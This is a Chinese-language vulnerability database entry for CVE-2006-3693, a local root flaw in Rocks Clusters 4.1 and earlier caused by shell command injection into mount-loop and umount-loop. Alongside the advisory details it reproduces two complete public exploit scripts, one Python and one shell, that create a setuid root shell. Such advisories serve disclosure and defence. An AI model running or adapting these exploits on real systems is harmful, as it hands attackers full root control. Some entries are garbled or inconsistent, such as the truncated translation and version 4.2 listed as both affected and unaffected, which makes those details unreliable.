CVE-2006-3693
CVSS4.6
发布时间 :2006-07-21 10:03:00
修订时间 :2011-03-07 21:39:14
NMOES    

[原文]Rocks Clusters 4.1 and earlier allows local users to gain privileges via commands enclosed with escaped backticks (\`) in an argument to the (1) mount-loop (mount-loop.c) or (2) umount-loop (umount-loop.c) command, which is not filtered in a system function call.


[CNNVD]CNNVD数据暂缺。


[机译]岩石集群4.1和更早版本允许本地用户获得权限通过命令随附逃脱反引号(\

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3693
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-3693
(官方数据源) NVD

- 其它链接及资源

http://www.securityfocus.com/bid/19003
(PATCH)  BID  19003
http://secunia.com/advisories/21065
(VENDOR_ADVISORY)  SECUNIA  21065
http://xforce.iss.net/xforce/xfdb/27758
(UNKNOWN)  XF  rocks-mount-umount-privilege-escalation(27758)
http://xavier.tigerteam.se/exploits/rocksumountdirty.py
(UNKNOWN)  MISC  http://xavier.tigerteam.se/exploits/rocksumountdirty.py
http://xavier.tigerteam.se/exploits/rocksmountdirty.sh
(UNKNOWN)  MISC  http://xavier.tigerteam.se/exploits/rocksmountdirty.sh
http://xavier.tigerteam.se/advisories/TSEAD-200606-6.txt
(UNKNOWN)  MISC  http://xavier.tigerteam.se/advisories/TSEAD-200606-6.txt
http://www.vupen.com/english/advisories/2006/2833
(UNKNOWN)  VUPEN  ADV-2006-2833
http://www.securityfocus.com/archive/1/archive/1/440126/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060714 Rocks Clusters <=4.1 local root
http://securityreason.com/securityalert/1242
(UNKNOWN)  SREASON  1242

- 漏洞信息 (2015)

Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit (EDBID:2015)
linux local
2006-07-15 Verified
0 Xavier de Leon
N/A [点击下载]
#!/usr/bin/env python
##############################################################################
##  rocksumountdirty.py: Rocks release <=4.1 local root exploit
##  quick and nasty version of the exploit. make sure the . is writable and
##  you clean up afterwards. ;)
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################
x=__import__('os');c=x.getcwd()
open('%s/x'%c, 'a').write("#!/bin/sh\ncp /bin/ksh %s/shell\nchmod a+xs %s/shell\nchown root.root %s/shell\n" % (c,c,c))
print "Rocks Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
x.system('umount-loop "\`sh %s/x\`"'%c);x.system("%s/shell"%c)

# milw0rm.com [2006-07-15]
		

- 漏洞信息 (2016)

Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit (EDBID:2016)
linux local
2006-07-15 Verified
0 Xavier de Leon
N/A [点击下载]
#!/bin/sh
##############################################################################
##  rocksmountdirty.sh: Rocks release <=4.1 local root exploit
##  make sure 'mount-loop' is in your path for this to work.
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################
echo "Rocks Clusters <=4.1 mount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
echo "getting root.. goodluck"
mount-loop "null" "null" "null; python -c 'import os;os.setuid(0);os.setgid(0);os.execl(\"/bin/sh\", \"/usr/sbin/httpd\")'"

# milw0rm.com [2006-07-15]
		

- 漏洞信息

27350
Rocks mount-loop Crafted Argument Local Privilege Escalation
Local Access Required Other
Loss of Confidentiality, Loss of Integrity
Exploit Public

- 漏洞描述

Rocks Clusters contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when 'umount-loop' fails to filter incoming arguments before setuid and system calls. This flaw may lead to a loss of Confidentiality and Integrity.

- 时间线

2006-07-05 2006-05-31
Unknow Unknow

- 解决方案

Upgrade to version 4.2 beta or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Rocks Clusters Local Privilege Escalation Vulnerabilities
Input Validation Error 19003
No Yes
2006-07-17 12:00:00 2007-03-08 03:35:00
These vulnerabilities were discovered by Xavier de Leon.

- 受影响的程序版本

Rocks Clusters Rocks Clusters 4.1
Rocks Clusters Rocks Clusters 4.0
Rocks Clusters Rocks Clusters 4.2

- 不受影响的程序版本

Rocks Clusters Rocks Clusters 4.2

- 漏洞讨论

Rocks Clusters is prone to multiple local privilege-escalation vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied input..

These issues allow local attackers to gain superuser privileges, facilitating the complete compromise of affected computers.

Rocks Clusters versions 4.1 and prior are vulnerable to these issues.

- 漏洞利用

Attackers can exploit these issues using a Linux command shell.

Sample exploit code has been provided:

- 解决方案

These issues have been addressed with the 4.2 release; please see the reference section for details.


Rocks Clusters Rocks Clusters 4.1

Rocks Clusters Rocks Clusters 4.0

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站